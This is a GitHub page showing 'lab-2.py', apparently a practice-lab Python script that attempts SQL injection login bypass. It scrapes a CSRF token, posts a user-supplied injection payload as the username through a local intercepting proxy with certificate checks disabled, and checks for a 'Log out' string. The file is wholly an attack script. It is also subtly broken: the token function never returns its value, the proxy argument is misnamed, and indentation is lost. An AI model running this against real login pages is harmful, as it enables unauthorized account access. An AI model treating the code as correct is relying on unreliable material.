-
Notifications
You must be signed in to change notification settings - Fork 0
/
lab-2.py
53 lines (35 loc) · 1.19 KB
/
lab-2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import requests
import sys
import urllib3
import pyfiglet
from bs4 import BeautifulSoup
ascii_banner = pyfiglet.figlet_format("RuhanSec\nSQLI\nSCRIPT")
print(ascii_banner)
proxy = {'http': 'http://127.0.0.1:8080'}
def get_csrf_token(s,url):
r = s.get(url, verify= False, proxy=proxy)
soup = BeautifulSoup(r.text, 'html.parser')
csrf= soup.find("input")['value']
print(csrf)
def exploit_sqli(s,url,payload):
csrf= get_csrf_token(s,url)
data = {"csrf":csrf,
"Username":payload,
"password":'randomtxt'}
r = s.post(url, data=data,proxy=proxy,verify=False)
res = r.text
if "Log out" in res:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = sys.argv[2].strip()
except IndexError:
print('[-] Example: %s <"www.example.com(target)"> <"1=1(payload)">'%sys.argv[0])
s = requests.Session()
if exploit_sqli(s,url,payload):
print('[+] sqli successful!')
else:
print('[-] sqli unsuccessful!')